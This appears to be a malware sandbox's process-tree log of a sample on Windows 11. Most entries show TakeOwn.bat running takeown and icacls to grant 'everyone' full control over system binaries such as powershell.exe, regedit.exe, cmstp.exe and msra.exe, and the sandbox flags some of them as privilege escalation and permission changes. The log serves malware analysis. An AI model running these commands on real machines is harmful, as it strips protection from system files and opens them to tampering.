C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\PATHPING.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\PING.EXE"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\PING.EXE"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\PING.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\TRACERT.EXE"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\TRACERT.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ping-utilities_31bf3856ad364e35_10.0.22000.1_none_09c9ecffc9049dc0\TRACERT.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.22000.1_none_c9ae46ac3b5c78ef\powershell.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.22000.1_none_c9ae46ac3b5c78ef\powershell.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.22000.1_none_c9ae46ac3b5c78ef\powershell.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-processmodel-cpt_31bf3856ad364e35_10.0.22000.1_none_0b6ad273acba9ca1\w3wp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-processmodel-cpt_31bf3856ad364e35_10.0.22000.1_none_0b6ad273acba9ca1\w3wp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-processmodel-cpt_31bf3856ad364e35_10.0.22000.1_none_0b6ad273acba9ca1\w3wp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-proquota_31bf3856ad364e35_10.0.22000.1_none_885f3fcfcb8efd54\proquota.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-proquota_31bf3856ad364e35_10.0.22000.1_none_885f3fcfcb8efd54\proquota.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-proquota_31bf3856ad364e35_10.0.22000.1_none_885f3fcfcb8efd54\proquota.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-provisioning-platform_31bf3856ad364e35_10.0.22000.1_none_cb20c829bd1c95e8\provlaunch.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-provisioning-platform_31bf3856ad364e35_10.0.22000.1_none_cb20c829bd1c95e8\provlaunch.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-provisioning-platform_31bf3856ad364e35_10.0.22000.1_none_cb20c829bd1c95e8\provlaunch.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\f\quickassist.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\f\quickassist.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\f\quickassist.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\quickassist.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\quickassist.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\quickassist.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\r\quickassist.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\r\quickassist.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_037bca9e287fff5c\r\quickassist.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-r..-commandline-editor_31bf3856ad364e35_10.0.22000.1_none_922c7bf563d94e50\reg.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-r..-commandline-editor_31bf3856ad364e35_10.0.22000.1_none_922c7bf563d94e50\reg.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-r..-commandline-editor_31bf3856ad364e35_10.0.22000.1_none_922c7bf563d94e50\reg.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-r..ckgroundmediaplayer_31bf3856ad364e35_10.0.22000.282_none_c161005c63dc5d29\Windows.Media.BackgroundPlayback.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-r..ckgroundmediaplayer_31bf3856ad364e35_10.0.22000.282_none_c161005c63dc5d29\Windows.Media.BackgroundPlayback.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-r..ckgroundmediaplayer_31bf3856ad364e35_10.0.22000.282_none_c161005c63dc5d29\Windows.Media.BackgroundPlayback.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_10.0.22000.1_none_bba9eafbb68c1dfb\rdrleakdiag.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_10.0.22000.1_none_bba9eafbb68c1dfb\rdrleakdiag.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_10.0.22000.1_none_bba9eafbb68c1dfb\rdrleakdiag.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\f\raserver.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\f\raserver.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\f\raserver.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\r\raserver.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\r\raserver.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\r\raserver.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\raserver.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\raserver.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-r..sistance-dcomserver_31bf3856ad364e35_10.0.22000.71_none_1c87d1fdc5c5037f\raserver.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rasautodial_31bf3856ad364e35_10.0.22000.1_none_707246ae9e7cf4ce\rasautou.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rasautodial_31bf3856ad364e35_10.0.22000.1_none_707246ae9e7cf4ce\rasautou.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rasautodial_31bf3856ad364e35_10.0.22000.1_none_707246ae9e7cf4ce\rasautou.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.22000.1_none_cfdf17c0e1db180b\rasdial.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.22000.1_none_cfdf17c0e1db180b\rasdial.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.22000.1_none_cfdf17c0e1db180b\rasdial.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.22000.1_none_cfdf17c0e1db180b\rasphone.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.22000.1_none_cfdf17c0e1db180b\rasphone.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.22000.1_none_cfdf17c0e1db180b\rasphone.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmdl32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmdl32.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmdl32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmmon32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmmon32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmmon32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmstp.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmstp.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.22000.1_none_bfb8876999af625a\cmstp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-recover_31bf3856ad364e35_10.0.22000.1_none_e6ab95c6edc4d4dd\recover.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-recover_31bf3856ad364e35_10.0.22000.1_none_e6ab95c6edc4d4dd\recover.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-recover_31bf3856ad364e35_10.0.22000.1_none_e6ab95c6edc4d4dd\recover.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-regini_31bf3856ad364e35_10.0.22000.1_none_6cee8466f2fab8e9\regini.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-regini_31bf3856ad364e35_10.0.22000.1_none_6cee8466f2fab8e9\regini.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-regini_31bf3856ad364e35_10.0.22000.1_none_6cee8466f2fab8e9\regini.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.22000.1_none_54c6fd5d15027c02\regedit.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.22000.1_none_54c6fd5d15027c02\regedit.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.22000.1_none_54c6fd5d15027c02\regedit.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.22000.1_none_54c6fd5d15027c02\regedt32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.22000.1_none_54c6fd5d15027c02\regedt32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.22000.1_none_54c6fd5d15027c02\regedt32.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-regsvr32_31bf3856ad364e35_10.0.22000.1_none_d8ef654968ad6d9d\regsvr32.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-regsvr32_31bf3856ad364e35_10.0.22000.1_none_d8ef654968ad6d9d\regsvr32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-regsvr32_31bf3856ad364e35_10.0.22000.1_none_d8ef654968ad6d9d\regsvr32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\msra.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\msra.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\msra.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\sdchange.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\sdchange.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\f\sdchange.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\msra.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\msra.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\msra.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\r\msra.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\r\msra.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\r\msra.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\r\sdchange.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\r\sdchange.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\r\sdchange.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\sdchange.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\sdchange.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\sdchange.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-restartmanager_31bf3856ad364e35_10.0.22000.1_none_e0cdafc35d48718b\RmClient.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-restartmanager_31bf3856ad364e35_10.0.22000.1_none_e0cdafc35d48718b\RmClient.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-restartmanager_31bf3856ad364e35_10.0.22000.1_none_e0cdafc35d48718b\RmClient.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.1_none_279f7779258e1224\Robocopy.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.1_none_279f7779258e1224\Robocopy.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.1_none_279f7779258e1224\Robocopy.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\f\Robocopy.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\f\Robocopy.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\f\Robocopy.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\r\Robocopy.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\r\Robocopy.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\r\Robocopy.exe" /grant "everyone":(f)3⤵
-
-
-
